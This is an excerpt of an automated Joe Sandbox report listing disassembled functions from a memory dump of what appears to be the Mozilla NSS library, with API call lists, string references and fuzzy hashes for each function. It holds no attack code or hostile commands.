Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTable
String ID:
API String ID: 3089169597-0
Opcode ID: 4b6115011f8ef676e37550ad9e942abe6cf97ca20b9cf4cf05302044f618571d
Instruction ID: 58cd612cf09545ded18440b7b533ee7365905c9ca72a63ea96347c2afa8d834f
Opcode Fuzzy Hash: 4b6115011f8ef676e37550ad9e942abe6cf97ca20b9cf4cf05302044f618571d
Instruction Fuzzy Hash: DC41C6B9E00251ABEB019F29EC8096677B8FF5621DF0445B0EC1987B22EB31DD14C7E2

Function 6C57BFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C57BFFB

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C57C015

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C57C032
DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C57C04D

Part of subcall function 6C5C69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5C6A47
Part of subcall function 6C5C69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C5C6A64

DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C57C064
CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C57C07B

Part of subcall function 6C578980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C577310), ref: 6C5789B8
Part of subcall function 6C578980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C577310), ref: 6C5789E6
Part of subcall function 6C578980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C578A00
Part of subcall function 6C578980: CERT_CopyRDN.NSS3(00000004,00000000,6C577310,?,?,00000004,?), ref: 6C578A1B
Part of subcall function 6C578980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C578A74

Part of subcall function 6C571D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C57C097,00000000,000000B0,?), ref: 6C571D2C
Part of subcall function 6C571D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C57C09B,00000000,00000000,00000000,?,6C57C097,00000000,000000B0,?), ref: 6C571D3F
Part of subcall function 6C571D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C57C087,00000000,000000B0,?), ref: 6C571D54

CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C57C0AD
SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C57C0C9

Part of subcall function 6C582DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C57C0D2,6C57C0CE,00000000,-000000D4,?), ref: 6C582DF5
Part of subcall function 6C582DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C57C0CE,00000000,-000000D4,?), ref: 6C582E27

CERT_DestroyCertificate.NSS3(00000000), ref: 6C57C0D6
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C57C0E3

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
String ID:
API String ID: 3955726912-0
Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction ID: dda8ad48e2c7b310a8125455ad6980d4f3d4ecb48d0b156500d8d187019ed12e
Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction Fuzzy Hash: 2F21A4F664020567FB106A61AC85FFF36AC9B8175CF080134FD04DA646FB26E95983B3

Function 6C572E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C572CDA,?,00000000), ref: 6C572E1E

Part of subcall function 6C5CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C579003,?), ref: 6C5CFD91
Part of subcall function 6C5CFD80: PORT_Alloc_Util.NSS3(A4686C5D,?), ref: 6C5CFDA2
Part of subcall function 6C5CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C5D,?,?), ref: 6C5CFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C572E33

Part of subcall function 6C5CFD80: free.MOZGLUE(00000000,?,?), ref: 6C5CFDD1

TlsGetValue.KERNEL32 ref: 6C572E4E
EnterCriticalSection.KERNEL32(?), ref: 6C572E5E
PL_HashTableLookup.NSS3(?), ref: 6C572E71
PL_HashTableRemove.NSS3(?), ref: 6C572E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C572E96
PR_Unlock.NSS3 ref: 6C572EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C572EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C572EC5

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 583c2145bebbf5d49cd439bcdf5d0cb9220ed15a3b869bca67aec5a7fbd2c306
Instruction ID: 87863711b6c6718fd99de5e6984ecd7fe7de4000802caeec08c0dc94083e9ee2
Opcode Fuzzy Hash: 583c2145bebbf5d49cd439bcdf5d0cb9220ed15a3b869bca67aec5a7fbd2c306
Instruction Fuzzy Hash: E1210772E00100E7EF115B66EC49EAB3B75EB9235DF040134ED1882B21FB32D998C6E9

Function 6C55FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C55FD18
sqlite3_initialize.NSS3 ref: 6C55FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C55FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C55FD99
sqlite3_free.NSS3(00000000), ref: 6C55FE3C
sqlite3_free.NSS3(?), ref: 6C55FEE3
sqlite3_free.NSS3(?), ref: 6C55FEEE

Strings

simple, xrefs: 6C55FC79

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: b283d37acb5c243477acc7ba00b9f0b91cc742f891a462fce0026b1cdd31908c
Instruction ID: 8eb8601a449b8f5189dd9c7b4fb7929803ad0ed0b81276adc2ea1bd2fc3bdc69
Opcode Fuzzy Hash: b283d37acb5c243477acc7ba00b9f0b91cc742f891a462fce0026b1cdd31908c
Instruction Fuzzy Hash: 7A9161B0B012059FDB04CF55CC80AAAB7B1FF85318F65C66ED8199BB52E731E961CB90

Function 6C565CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C565EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C565EED

Strings

misuse, xrefs: 6C565EDB
API call with %s database connection pointer, xrefs: 6C565EC3
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C565ED1
invalid, xrefs: 6C565EBE
%s at line %d of [%.10s], xrefs: 6C565EE0
unable to close due to unfinalized statements or unfinished backups, xrefs: 6C565E64

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 3f181ba975708340b48c55048765ae67c01761014f51da05d2814571f22d88cf
Instruction ID: 236c82d6aec60ee9c422e345c4868acee8fadd44f7174a168b185e2196773b8a
Opcode Fuzzy Hash: 3f181ba975708340b48c55048765ae67c01761014f51da05d2814571f22d88cf
Instruction Fuzzy Hash: 9781CF70B856019BEB19CF26CC48B6AB770BF41308F984669D8155BFA2D730ED42CBD5

Function 6C54DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C54DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C54DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C54DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C54DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C54DF78

Strings

database corruption, xrefs: 6C54DE5C, 6C54DE8B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C54DE52, 6C54DE81
%s at line %d of [%.10s], xrefs: 6C54DE61, 6C54DE90

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: af5d49554353dfe3b9b09a2491019a6c23f378000c27c3950e364a7731004b60
Instruction ID: a28261527f9371f54c4abdae8092a77e724eac9ed796f8af36db3fdc45d5f99e
Opcode Fuzzy Hash: af5d49554353dfe3b9b09a2491019a6c23f378000c27c3950e364a7731004b60
Instruction Fuzzy Hash: 1B817C71604700AFD714DF65CC80B6A77F1AF85308F14C86DE99A8BB91EB35E846CB92

Function 6C4FCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C4FB999), ref: 6C4FCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C4FB999), ref: 6C4FD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C4FB999), ref: 6C4FD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C4FB999), ref: 6C64972B

Strings

database corruption, xrefs: 6C4FCFE7, 6C4FD013, 6C4FD028, 6C4FD039, 6C4FD03E, 6C649786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4FCFDD, 6C4FD00E, 6C4FD022, 6C4FD033, 6C649780
%s at line %d of [%.10s], xrefs: 6C4FCFEC, 6C4FD018, 6C4FD029, 6C4FD03F, 6C64978B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: fd3b883d8c1ad9866c0a1181c0e32910e0a85ddd5e41250f96e6fcf2c49e8960
Instruction ID: 3f93dffec109dbb52913e084bf614d689c99557b0055b1b293d526c655418f5f
Opcode Fuzzy Hash: fd3b883d8c1ad9866c0a1181c0e32910e0a85ddd5e41250f96e6fcf2c49e8960
Instruction Fuzzy Hash: DB612571A442109BD310CF29C840FA6B7F5EF95318F2881ADE449ABB82D376E947C7A5

Function 6C5FFFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C605B40: PR_GetIdentitiesLayer.NSS3 ref: 6C605B56

PK11_FreeSymKey.NSS3(00000000), ref: 6C600113
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C600130
PORT_Alloc_Util.NSS3(00000040), ref: 6C60015D
memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C6001AF
PR_SetError.NSS3(FFFFD056,00000000), ref: 6C600202
free.MOZGLUE(?), ref: 6C600224
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C600253

Strings

exporter, xrefs: 6C6000F7

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
String ID: exporter
API String ID: 712147604-111224270
Opcode ID: ac6675265e8aabbcd80cad1b2c49bff09a5d79ce783b5ae5d4c49c37aec59423
Instruction ID: 891d64c313f113a521cb215356c0f2c373e8acb2240a51dd61795492fd1057f8
Opcode Fuzzy Hash: ac6675265e8aabbcd80cad1b2c49bff09a5d79ce783b5ae5d4c49c37aec59423
Instruction Fuzzy Hash: 79613771A047899BEF098FA4CE00BEE77B6FF8530CF144128E91A66662EB31DD54C749

Function 6C5D4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C5D536F,00000022,?,?,00000000,?), ref: 6C5D4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C5D4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C5D4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C5D4FAE
free.MOZGLUE(?), ref: 6C5D4FC8

Strings

%s=%c%s%c, xrefs: 6C5D4FA9
%s=%s, xrefs: 6C5D4F89
oS]l", xrefs: 6C5D4DFB, 6C5D4EF4, 6C5D4EC5

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oS]l"
API String ID: 2709355791-1146252471
Opcode ID: c6c576b89fdef526ad10bbea6abb6326fa564385e2576c64e5f6325a40859a46
Instruction ID: 40f66d93c40b3d86f8e275ee2d9df71cbc5696eb0e5fc972e4f831b709a2b480
Opcode Fuzzy Hash: c6c576b89fdef526ad10bbea6abb6326fa564385e2576c64e5f6325a40859a46
Instruction Fuzzy Hash: A2512971A05347ABEB01CB6D8C907FE7BF5DF46308F1A8125E894A7B41D325A805879B

Function 6C5FEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C61A4A1,?,00000000,?,00000001), ref: 6C5FEF6D

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

htonl.WSOCK32(00000000,?,6C61A4A1,?,00000000,?,00000001), ref: 6C5FEFE4
htonl.WSOCK32(?,00000000,?,6C61A4A1,?,00000000,?,00000001), ref: 6C5FEFF1
memcpy.VCRUNTIME140(?,?,6C61A4A1,?,00000000,?,6C61A4A1,?,00000000,?,00000001), ref: 6C5FF00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C61A4A1,?,00000000,?,00000001), ref: 6C5FF027

Strings

dtls13, xrefs: 6C5FEF33

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 66d4d7bfc486ddf6b436912467d0821e5f225fad9a9d2cc600196e1d48ba6e60
Instruction ID: 3b8104447904b32f9db68ae29fb80a2f923dc1574c68b05ec3e300bbd0de24f9
Opcode Fuzzy Hash: 66d4d7bfc486ddf6b436912467d0821e5f225fad9a9d2cc600196e1d48ba6e60
Instruction Fuzzy Hash: DC312671A01311AFD710DF28CC80B8AB7E4EF89348F158129E8299B751E731E916CFE9

Function 6C57AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C57AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C699500,6C573F91), ref: 6C57AFD2

Part of subcall function 6C5CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A18D0,?), ref: 6C5CB095

DER_GetInteger_Util.NSS3(?), ref: 6C57B007

Part of subcall function 6C5C6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C571666,?,6C57B00C,?), ref: 6C5C6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C57B02F
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C57B046
PL_FreeArenaPool.NSS3 ref: 6C57B058
PL_FinishArenaPool.NSS3 ref: 6C57B060

Strings

security, xrefs: 6C57AFB8

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: aede62ad3e44658129cd3559dfda4b6a9e1acbf85e29353c350192a6bbd80478
Instruction ID: a04a1de24fdd0b83a7dbef2dfa4c37d4202632d732fc14f961013aa3eb6df7e8
Opcode Fuzzy Hash: aede62ad3e44658129cd3559dfda4b6a9e1acbf85e29353c350192a6bbd80478
Instruction Fuzzy Hash: A7310A70404300DBDB20DF149C49BAA77A4AF8636CF140B1DE9759BBD1E7329549C7AB

Function 6C573E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 6C5740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C573F7F,?,00000055,?,?,6C571666,?,?), ref: 6C5740D9
Part of subcall function 6C5740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C571666,?,?), ref: 6C5740FC
Part of subcall function 6C5740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C571666,?,?), ref: 6C574138

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C573EC2
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C573ED6

Part of subcall function 6C5CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A18D0,?), ref: 6C5CB095

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C573EEE

Part of subcall function 6C5CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5C8D2D,?,00000000,?), ref: 6C5CFB85
Part of subcall function 6C5CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5CFBB1

PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C573F02
PL_FreeArenaPool.NSS3 ref: 6C573F14
PL_FinishArenaPool.NSS3 ref: 6C573F1C

Part of subcall function 6C5D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C5D127C,00000000,00000000,00000000), ref: 6C5D650E

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C573F27

Strings

security, xrefs: 6C573EBC

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

